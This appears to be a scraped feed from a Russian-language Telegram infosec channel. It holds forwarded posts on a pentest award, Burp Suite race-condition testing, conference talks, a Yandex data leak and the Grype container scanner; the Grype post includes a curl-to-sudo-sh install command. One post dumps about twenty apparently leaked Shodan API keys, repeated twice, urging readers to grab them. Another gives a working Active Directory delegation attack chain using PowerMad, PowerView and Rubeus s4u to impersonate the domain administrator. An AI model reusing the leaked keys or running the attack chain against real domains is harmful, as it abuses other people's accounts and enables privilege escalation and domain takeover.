Forwarded from Just Security
Новостной репортаж по следам церемонии награждения Pentest award. А кейсы финалистов проходят цензуру и скоро появятся в специальном выпуске журнала ][
stay tuned🙌
stay tuned🙌
Хабр
Лучших этичных хакеров России наградили премией
3 августа прошла церемония награждения Pentest award – премии для специалистов по тестированию на проникновение. Paul Axe награждает победителя номинации «Раз bypass, два bypass» Организаторы –...
👍5❤🔥2🔥2
Не большой офф-топ закину. Не пользуйтесь библиотекой Telethon. Очень велик шанс потерять аккаунт, прочитать можно тут и на Reddit. Разраб отнекивается и говорит, что он не виноват. Но по факту у разных людей прилетает автоматически бан на акк, что ровняется удаление аккаунта навсегда, другим теневой бан прилетает. Мне ещё повезло, просто разлогинило везде, но и в аккаунт зайти не могу (получение кода по SMS отказывается работать). Если кто сталкивался с таким, отпишите в комментариях. пожалуйста.
P.S. @Jayref смог помочь, за что ему огромное спасибо
P.S. @Jayref смог помочь, за что ему огромное спасибо
GitHub
GitHub - LonamiWebs/Telethon: Pure Python 3 MTProto API Telegram client library, for bots too!
Pure Python 3 MTProto API Telegram client library, for bots too! - LonamiWebs/Telethon
🫡3⚡1👾1
Forwarded from Proxy Bar
SHODAN keys успевайте
OefcMxcunkm72Po71vVtX8zUN57vQtAC
PSKINdQe1GyxGgecYz2191H2JoS9qvgD
pHHlgpFt8Ka3Stb5UlTxcaEwciOeF2QM
61TvA2dNwxNxmWziZxKzR5aO9tFD00Nj
xTbXXOSBr0R65OcClImSwzadExoXU4tc
EJV3A4Mka2wPs7P8VBCO6xcpRe27iNJu
mEuInz8UH1ixLGJq4oQhEiJORERVG5xc
lkY0ng0XMo29zEhzyw3ibQfeEBxghwPF
syeCnFndQ8TE4qAGvhm9nZLBZOBgoLKd
7TeyFZ8oyLulHwYUOcSPzZ5w3cLYib61
v4YpsPUJ3wjDxEqywwu6aF5OZKWj8kik
dTNGRiwYNozXIDRf5DWyGNbkdiS5m3JK
kdnzf4fsYWQmGajRDn3hB0RElbUlIaqu
boYedPn8iDWi6GDSO6h2kz72VLt6bZ3S
FQNAMUdkeqXqVOdXsTLYeatFSpZSktdb
OygcaGSSq46Lg5fZiADAuFxl4OBbn7zm
XAbsu1Ruj5uhTNcxGdbGNgrh9WuMS1B6
nkGd8uVE4oryfUVvioprswdKGmA5InzZ
XYdjHDeJM36AjDfU1feBsyMJIj8XxGzD
EBeU0lGqtIO6yCxVFCWC4nUVbvovtjo5
OefcMxcunkm72Po71vVtX8zUN57vQtAC
PSKINdQe1GyxGgecYz2191H2JoS9qvgD
pHHlgpFt8Ka3Stb5UlTxcaEwciOeF2QM
61TvA2dNwxNxmWziZxKzR5aO9tFD00Nj
xTbXXOSBr0R65OcClImSwzadExoXU4tc
EJV3A4Mka2wPs7P8VBCO6xcpRe27iNJu
mEuInz8UH1ixLGJq4oQhEiJORERVG5xc
lkY0ng0XMo29zEhzyw3ibQfeEBxghwPF
syeCnFndQ8TE4qAGvhm9nZLBZOBgoLKd
7TeyFZ8oyLulHwYUOcSPzZ5w3cLYib61
v4YpsPUJ3wjDxEqywwu6aF5OZKWj8kik
dTNGRiwYNozXIDRf5DWyGNbkdiS5m3JK
kdnzf4fsYWQmGajRDn3hB0RElbUlIaqu
boYedPn8iDWi6GDSO6h2kz72VLt6bZ3S
FQNAMUdkeqXqVOdXsTLYeatFSpZSktdb
OygcaGSSq46Lg5fZiADAuFxl4OBbn7zm
XAbsu1Ruj5uhTNcxGdbGNgrh9WuMS1B6
nkGd8uVE4oryfUVvioprswdKGmA5InzZ
XYdjHDeJM36AjDfU1feBsyMJIj8XxGzD
EBeU0lGqtIO6yCxVFCWC4nUVbvovtjo5
⚡2
Forwarded from SHADOW:Group
Race Condition в Burp Suite стало искать еще проще, а все благодаря добавлению возможности отправки нескольких HTTP/2 запросов в одном TCP пакете. Данный способ значительно выигрывает в эффективности и позволяет побороть сетевые задержки при отправке отдельными запросами и находить уязвимости в приложениях с очень низким временным лимитом для атаки.
Сделать это можно закинув несколько запросов в Repeater, а затем объединив их в группу. В группе надо выбрать "
Group send options" и выставить "Send Group in parallel" (смотри скрин ниже). Можно также использовать turbo-intruder с шаблоном по ссылке.Потестить, как это работает, можно на данной лабе.
#web #race #tools
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5
SHADOW:Group
Спасибо коллеге Shadow:Group за один из лучших контентов в ИБ ру комьюнити!
Forwarded from Monkey Hacker
Computer Object Takeover
Завершая играться с AD, нашел достаточно интересный сценарий, связанный с абьюзом
Если в сетке есть пользователь с правами
Данный сценарий возможен, т.к🔥
Для этого мы создаем новую учетку тачки. По дефолту параметр
SID в принципе и сами можете вставить, но решил чуть облегчить процесс 🐈
После этого можно использовать тот же
И затем юзаем
Для облегчения я юзал PowerMad и PowerView
Bye-bye🎧
Завершая играться с AD, нашел достаточно интересный сценарий, связанный с абьюзом
GenericЕсли в сетке есть пользователь с правами
GenericWrite, то возможно зайти с повышенными привилегиями на другой тачкеДанный сценарий возможен, т.к
Generic позволяет изменять DACL Для этого мы создаем новую учетку тачки. По дефолту параметр
ms-DS-MachineAccountQuota позволяет всем пользователям домена добавлять до 10 учетных записей машинNew-MachineAccount -MachineAccount aboba -Password $(ConvertTo-SecureString
'Test@123' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer -Domain dev.domain.local aboba -Properties objectsid | select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer dc02.domain.local | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}После этого можно использовать тот же
Rubeus, для получения RC4-хэша. Rubeus.exe hash /user:aboba /password:Test@123 /domain:dev.domain.localИ затем юзаем
s4u для повышения своих привилегий за счет получения TGSRubeus.exe s4u /user:aboba$ /rc4:4E35B802576F770E77851BAB9D4AE172 /impersonateuser:administrator /msdsspn:cifs/dc02.domain.local /pttДля облегчения я юзал PowerMad и PowerView
Bye-bye
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - Kevin-Robertson/Powermad: PowerShell MachineAccountQuota and DNS exploit tools
PowerShell MachineAccountQuota and DNS exploit tools - Kevin-Robertson/Powermad
❤3
Forwarded from Cybred
Black Hat USA 2023
Schedule
Presentations
DEF CON 31
Schedule
Presentations
Расписание (с описанием докладов) и презентации с Black Hat USA 2023 & DEF CON 31
Schedule
Presentations
DEF CON 31
Schedule
Presentations
Расписание (с описанием докладов) и презентации с Black Hat USA 2023 & DEF CON 31
❤🔥2
Cybred
Black Hat USA 2023 Schedule Presentations DEF CON 31 Schedule Presentations Расписание (с описанием докладов) и презентации с Black Hat USA 2023 & DEF CON 31
Очень интересные доклады. Советую посмотреть всем)
Всё просто. От вас требуется:
Ровно в 00:00 по МСК 15 числа опубликуем победителя 😎
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥6👍2⚡1❤1
Вот пруфы
Свяжусь с ним и выдам волшебный промокод на проходку на OFFZONE
Please open Telegram to view this post
VIEW IN TELEGRAM
randstuff.ru
Случайное число: 1
❤🔥7👍4⚡1
Forwarded from Brotherok
Билет получен. Большая и тёплая благодарность автору канала. 🤗
👍4
Forwarded from SecAtor
Наверняка многие помнят утечку 45 гигов сырцов Яндекса, которая случилась в январе текущего года. Бомбежка тогда случилась знатная, беглым поиском нашли много чего интересного, например наличие приоритетных групп пользователей. Яндекс даже был вынужден признать возможность скрытого удаленного включения микрофона Яндекс.Станции.
Ну было и было. Яндекс же. Ему можно.
А тут на прошлой неделе случился Black Hat USA 2023. А там Кейли МакКри из Confiant сделала доклад, в котором содержался разбор этой утечки с точки зрения конфиденциальности пользователей сервисов Яндекс.
В смысле с точки зрения отсутствия этой конфиденциальности. Конкретно смотрели на Яндекс Метрику и на Крипту, инструменты веб-аналитики Яндекса.
Там пиздец, конечно, хтонических масштабов. Собирают в принципе все подряд - высоту местоположения(?), направление и скорость движения, данные базовых станций, информацию по Wi-Fi (куда ж без этого),размер пинуса etc. Сортируют пользователей на "курильщиков", "видеоблогеров", "представителей индустрии" (!) и даже "искателей отелей Рэддисон на карте". По мнению Яндекса - все это "неперсонализированные и очень ограниченные" сведения.
И это, в приципе, понятно и все обо всем догадываются. Контекстная реклама сама себя не подберет.
Но как вам, например, то, что Яндекс выстраивает графы людей, проживающих рядом? А извлечение из почты данных о билетах, посадочных талонах и бронировании отеля? А сегментирование возраста детей по их голосу, полученному через Яндекс.Станцию?
Так, на минутку, в способности Яндекса проеживать пользовательские данные по-крупному мы уже убедились - Яндекс.Еда теперь во всех пробивных ботах красуется. Равно как помним и про то, что их с помощью Regin британцы с АНБшниками в 2018 году распотрошили.
Печально все это. Хоть в скит подавайся.
Ну было и было. Яндекс же. Ему можно.
А тут на прошлой неделе случился Black Hat USA 2023. А там Кейли МакКри из Confiant сделала доклад, в котором содержался разбор этой утечки с точки зрения конфиденциальности пользователей сервисов Яндекс.
В смысле с точки зрения отсутствия этой конфиденциальности. Конкретно смотрели на Яндекс Метрику и на Крипту, инструменты веб-аналитики Яндекса.
Там пиздец, конечно, хтонических масштабов. Собирают в принципе все подряд - высоту местоположения(?), направление и скорость движения, данные базовых станций, информацию по Wi-Fi (куда ж без этого),
И это, в приципе, понятно и все обо всем догадываются. Контекстная реклама сама себя не подберет.
Но как вам, например, то, что Яндекс выстраивает графы людей, проживающих рядом? А извлечение из почты данных о билетах, посадочных талонах и бронировании отеля? А сегментирование возраста детей по их голосу, полученному через Яндекс.Станцию?
Так, на минутку, в способности Яндекса проеживать пользовательские данные по-крупному мы уже убедились - Яндекс.Еда теперь во всех пробивных ботах красуется. Равно как помним и про то, что их с помощью Regin британцы с АНБшниками в 2018 году распотрошили.
Печально все это. Хоть в скит подавайся.
Confiant
The Yandex Leak: How a Russian Search Giant Uses Consumer Data
In late January 2023, almost 45 GB of source code from the Russian search giant Yandex was leaked on BreachForums by a former Yandex employee.
❤6
Forwarded from Cybred
Помимо обновления для Burp Suite, по мотивам ресерча "Smashing the state machine: the true potential of web race conditions" добавили и новые лабы.
Теория:
— What is a race condition?
— Limit overrun race conditions
— Hidden multi-step sequences
— Methodology
— Multi-endpoint race conditions
— Single-endpoint race conditions
— Session-based locking mechanisms
— Partial construction race conditions
— Time-sensitive attacks
— Preventing race conditions
Практика:
— Limit overrun race conditions
— Bypassing rate limits via race conditions
— Multi-endpoint race conditions
— Single-endpoint race conditions
— Exploiting time-sensitive vulnerabilities
— Partial construction race conditions
Теория:
— What is a race condition?
— Limit overrun race conditions
— Hidden multi-step sequences
— Methodology
— Multi-endpoint race conditions
— Single-endpoint race conditions
— Session-based locking mechanisms
— Partial construction race conditions
— Time-sensitive attacks
— Preventing race conditions
Практика:
— Limit overrun race conditions
— Bypassing rate limits via race conditions
— Multi-endpoint race conditions
— Single-endpoint race conditions
— Exploiting time-sensitive vulnerabilities
— Partial construction race conditions
⚡11❤🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
🔴🔵Grype
Сканер уязвимостей для образов контейнеров и файловых систем. Простая установка бинарного файла для опробования. Работает с Syft, мощным инструментом SBOM (software bill of materials) для контейнерных образов и файловых систем.
Установка:
Вывод Grype
💬 Канал | 💻 Github
Сканер уязвимостей для образов контейнеров и файловых систем. Простая установка бинарного файла для опробования. Работает с Syft, мощным инструментом SBOM (software bill of materials) для контейнерных образов и файловых систем.
Установка:
curl -sSfL https://raw.githubusercontent.com/anchore/grype/main/install.sh | sudo sh -s -- -b /usr/local/binдля MacOS
brew tap anchore/grypeИспользование:
brew install grype
sudo port install grype
grype <image># Иногда при расследованиях инцидента вам придётся откатывать бекапные образы контейнеров, но скорее всего их тоже смогут взломать. Так что вы можете сканировать архивы контейнеров на наличие уязвимостей.
grype <image> --scope all-layers
docker run --rm \
--volume /var/run/docker.sock:/var/run/docker.sock \
--name Grype anchore/grype:latest \
$(ImageName):$(ImageTag)
grype path/to/image.tarТакже поддерживается Singularity Image Format (SIF)
grype path/to/image.sifТакже данный инструмент легко встроить в CI/CD
Вывод Grype
{
"vulnerability": {
...
},
"relatedVulnerabilities": [
...
],
"matchDetails": [
...
],
"artifact": {
...
}
}
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6